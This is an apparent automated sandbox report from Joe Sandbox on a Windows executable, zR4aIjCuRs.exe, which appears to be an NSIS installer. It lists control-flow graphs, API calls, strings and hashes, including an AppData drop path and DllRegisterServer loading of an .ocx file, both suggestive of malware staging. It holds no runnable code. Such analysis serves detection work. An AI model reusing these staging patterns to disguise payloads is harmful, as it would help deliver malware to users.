                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                  • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                  • RegisterClassW.USER32(00433E80), ref: 00403C14
                                  • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Space available: $_Nb
                                  • API String ID: 1975747703-1620046868
                                  • Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                  • Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
                                  • Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                  • Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 472 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 475 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 472->475 476 402f2d-402f32 472->476 484 403052-403060 call 402e79 475->484 485 402f6b 475->485 477 40310f-403113 476->477 491 403062-403065 484->491 492 4030b5-4030ba 484->492 486 402f70-402f87 485->486 489 402f89 486->489 490 402f8b-402f94 call 403331 486->490 489->490 498 402f9a-402fa1 490->498 499 4030bc-4030c4 call 402e79 490->499 494 403067-40307f call 403347 call 403331 491->494 495 403089-4030b3 GlobalAlloc call 403347 call 403116 491->495 492->477 494->492 518 403081-403087 494->518 495->492 523 4030c6-4030d7 495->523 502 402fa3-402fb7 call 405d6b 498->502 503 40301d-403021 498->503 499->492 509 40302b-403031 502->509 521 402fb9-402fc0 502->521 508 403023-40302a call 402e79 503->508 503->509 508->509 514 403040-40304a 509->514 515 403033-40303d call 406787 509->515 514->486 522 403050 514->522 515->514 518->492 518->495 521->509 527 402fc2-402fc9 521->527 522->484 524 4030d9 523->524 525 4030df-4030e4 523->525 524->525 528 4030e5-4030eb 525->528 527->509 529 402fcb-402fd2 527->529 528->528 530 4030ed-403108 SetFilePointer call 405d6b 528->530 529->509 531 402fd4-402fdb 529->531 535 40310d 530->535 531->509 533 402fdd-402ffd 531->533 533->492 534 403003-403007 533->534 536 403009-40300d 534->536 537 40300f-403017 534->537 535->477 536->522 536->537 537->509 538 403019-40301b 537->538 538->509
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                  • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                    • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                    • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                  Strings
                                  • Inst, xrefs: 00402FC2
                                  • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                  • soft, xrefs: 00402FCB
                                  • "C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 00402EDD
                                  • Null, xrefs: 00402FD4
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                  • Error launching installer, xrefs: 00402F2D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 4283519449-3999871799
                                  • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                  • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                  • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                  • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 539 4062dc-4062e7 540 4062e9-4062f8 539->540 541 4062fa-406310 539->541 540->541 542 406316-406323 541->542 543 406528-40652e 541->543 542->543 546 406329-406330 542->546 544 406534-40653f 543->544 545 406335-406342 543->545 547 406541-406545 call 4062ba 544->547 548 40654a-40654b 544->548 545->544 549 406348-406354 545->549 546->543 547->548 551 406515 549->551 552 40635a-406398 549->552 555 406523-406526 551->555 556 406517-406521 551->556 553 4064b8-4064bc 552->553 554 40639e-4063a9 552->554 557 4064be-4064c4 553->557 558 4064ef-4064f3 553->558 559 4063c2 554->559 560 4063ab-4063b0 554->560 555->543 556->543 562 4064d4-4064e0 call 4062ba 557->562 563 4064c6-4064d2 call 406201 557->563 565 406502-406513 lstrlenW 558->565 566 4064f5-4064fd call 4062dc 558->566 564 4063c9-4063d0 559->564 560->559 561 4063b2-4063b5 560->561 561->559 567 4063b7-4063ba 561->567 577 4064e5-4064eb 562->577 563->577 569 4063d2-4063d4 564->569 570 4063d5-4063d7 564->570 565->543 566->565 567->559 573 4063bc-4063c0 567->573 569->570 575 406412-406415 570->575 576 4063d9-406400 call 406188 570->576 573->564 580 406425-406428 575->580 581 406417-406423 GetSystemDirectoryW 575->581 588 4064a0-4064a3 576->588 589 406406-40640d call 4062dc 576->589 577->565 579 4064ed 577->579 585 4064b0-4064b6 call 40654e 579->585 582 406493-406495 580->582 583 40642a-406438 GetWindowsDirectoryW 580->583 586 406497-40649b 581->586 582->586 587 40643a-406444 582->587 583->582 585->565 586->585 590 40649d 586->590 593 406446-406449 587->593 594 40645e-406474 SHGetSpecialFolderLocation 587->594 588->585 596 4064a5-4064ab lstrcatW 588->596 589->586 590->588 593->594 597 40644b-406452 593->597 598 406476-40648d SHGetPathFromIDListW CoTaskMemFree 594->598 599 40648f 594->599 596->585 601 40645a-40645c 597->601 598->586 598->599 599->582 601->586 601->594
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(Space available: ,00000400), ref: 0040641D
                                  • GetWindowsDirectoryW.KERNEL32(Space available: ,00000400,00000000,Completed,?,00405359,Completed,00000000), ref: 00406430
                                  • SHGetSpecialFolderLocation.SHELL32(00405359,0041BA49,00000000,Completed,?,00405359,Completed,00000000), ref: 0040646C
                                  • SHGetPathFromIDListW.SHELL32(0041BA49,Space available: ), ref: 0040647A
                                  • CoTaskMemFree.OLE32(0041BA49), ref: 00406485
                                  • lstrcatW.KERNEL32(Space available: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                  • lstrlenW.KERNEL32(Space available: ,00000000,Completed,?,00405359,Completed,00000000), ref: 00406503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                  • String ID: Completed$Software\Microsoft\Windows\CurrentVersion$Space available: $\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 717251189-92884433
                                  • Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                  • Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
                                  • Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                  • Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 602 40176f-401794 call 402c41 call 405c06 607 401796-40179c call 4062ba 602->607 608 40179e-4017b0 call 4062ba call 405b8f lstrcatW 602->608 613 4017b5-4017b6 call 40654e 607->613 608->613 617 4017bb-4017bf 613->617 618 4017c1-4017cb call 4065fd 617->618 619 4017f2-4017f5 617->619 627 4017dd-4017ef 618->627 628 4017cd-4017db CompareFileTime 618->628 621 4017f7-4017f8 call 405d8b 619->621 622 4017fd-401819 call 405db0 619->622 621->622 629 40181b-40181e 622->629 630 40188d-4018b6 call 405322 call 403116 622->630 627->619 628->627 631 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 629->631 632 40186f-401879 call 405322 629->632 644 4018b8-4018bc 630->644 645 4018be-4018ca SetFileTime 630->645 631->617 664 401864-401865 631->664 642 401882-401888 632->642 646 402ace 642->646 644->645 648 4018d0-4018db CloseHandle 644->648 645->648 652 402ad0-402ad4 646->652 649 4018e1-4018e4 648->649 650 402ac5-402ac8 648->650 653 4018e6-4018f7 call 4062dc lstrcatW 649->653 654 4018f9-4018fc call 4062dc 649->654 650->646 660 401901-4022fc call 405920 653->660 654->660 660->650 660->652 664->642 666 401867-401868 664->666 666->632
                                  APIs
                                  • lstrcatW.KERNEL32(00000000,00000000,DllRegisterServer,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,00000031), ref: 004017B0
                                  • CompareFileTime.KERNEL32(-00000014,?,DllRegisterServer,DllRegisterServer,00000000,00000000,DllRegisterServer,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,00000031), ref: 004017D5
                                    • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                    • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                    • Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
                                    • Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                    • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\Desktop\xerophily.ocx$DllRegisterServer
                                  • API String ID: 1941528284-1953730542
                                  • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                  • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                  • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                  • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 668 405322-405337 669 40533d-40534e 668->669 670 4053ee-4053f2 668->670 671 405350-405354 call 4062dc 669->671 672 405359-405365 lstrlenW 669->672 671->672 674 405382-405386 672->674 675 405367-405377 lstrlenW 672->675 677 405395-405399 674->677 678 405388-40538f SetWindowTextW 674->678 675->670 676 405379-40537d lstrcatW 675->676 676->674 679 40539b-4053dd SendMessageW * 3 677->679 680 4053df-4053e1 677->680 678->677 679->680 680->670 681 4053e3-4053e6 680->681 681->670
                                  APIs
                                  • lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                  • lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                  • lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
                                  • SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID: Completed
                                  • API String ID: 2531174081-3087654605
                                  • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                  • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                  • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                  • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 682 403116-40312d 683 403136-40313f 682->683 684 40312f 682->684 685 403141 683->685 686 403148-40314d 683->686 684->683 685->686 687 40315d-40316a call 403331 686->687 688 40314f-403158 call 403347 686->688 692 403170-403174 687->692 693 40331f 687->693 688->687 694 4032ca-4032cc 692->694 695 40317a-4031c3 GetTickCount 692->695 696 403321-403322 693->696 697 40330c-40330f 694->697 698 4032ce-4032d1 694->698 699 403327 695->699 700 4031c9-4031d1 695->700 701 40332a-40332e 696->701 705 403311 697->705 706 403314-40331d call 403331 697->706 698->699 702 4032d3 698->702 699->701 703 4031d3 700->703 704 4031d6-4031e4 call 403331 700->704 707 4032d6-4032dc 702->707 703->704 704->693 716 4031ea-4031f3 704->716 705->706 706->693 714 403324 706->714 711 4032e0-4032ee call 403331 707->711 712 4032de 707->712 711->693 719 4032f0-4032fc call 405e62 711->719 712->711 714->699 718 4031f9-403219 call 4067f5 716->718 724 4032c2-4032c4 718->724 725 40321f-403232 GetTickCount 718->725 726 4032c6-4032c8 719->726 727 4032fe-403308 719->727 724->696 728 403234-40323c 725->728 729 40327d-40327f 725->729 726->696 727->707 732 40330a 727->732 733 403244-403275 MulDiv wsprintfW call 405322 728->733 734 40323e-403242 728->734 730 403281-403285 729->730 731 4032b6-4032ba 729->731 736 403287-40328e call 405e62 730->736 737 40329c-4032a7 730->737 731->700 738 4032c0 731->738 732->699 739 40327a 733->739 734->729 734->733 742 403293-403295 736->742 741 4032aa-4032ae 737->741 738->699 739->729 741->718 743 4032b4 741->743 742->726 744 403297-40329a 742->744 743->699 744->741
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%$TmA$@
                                  • API String ID: 551687249-1145333836
                                  • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                  • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                  • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                  • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 745 406624-406644 GetSystemDirectoryW 746 406646 745->746 747 406648-40664a 745->747 746->747 748 40665b-40665d 747->748 749 40664c-406655 747->749 750 40665e-406691 wsprintfW LoadLibraryExW 748->750 749->748 751 406657-406659 749->751 751->750
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                  • wsprintfW.USER32 ref: 00406676
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
